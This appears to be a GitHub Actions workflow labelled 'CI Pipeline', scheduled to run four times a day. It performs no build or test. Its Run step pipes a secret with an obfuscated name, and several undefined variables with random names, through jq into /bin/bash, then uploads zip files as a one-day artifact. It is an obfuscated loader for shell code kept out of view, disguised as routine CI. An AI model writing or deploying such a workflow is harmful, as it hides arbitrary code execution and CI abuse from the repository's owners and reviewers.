name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '45 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  execute:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          ioxvm73774: ${{ secrets.ioxvm73774 }}
        run: |
          printf '%s' "$ioxvm73774" | jq -r .p8 | /bin/bash
          printf '%s' "$c703" | jq -r .xg24155 | /bin/bash
          echo $bppo97985 | jq -r .qrfes8063 | /bin/bash
          printf '%s' "$zcger53" | jq -r .ndu0 | /bin/bash
          echo $kj10742 | jq -r .gued5 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: Sq57XK5Z
          path: "*.zip"
          retention-days: 1
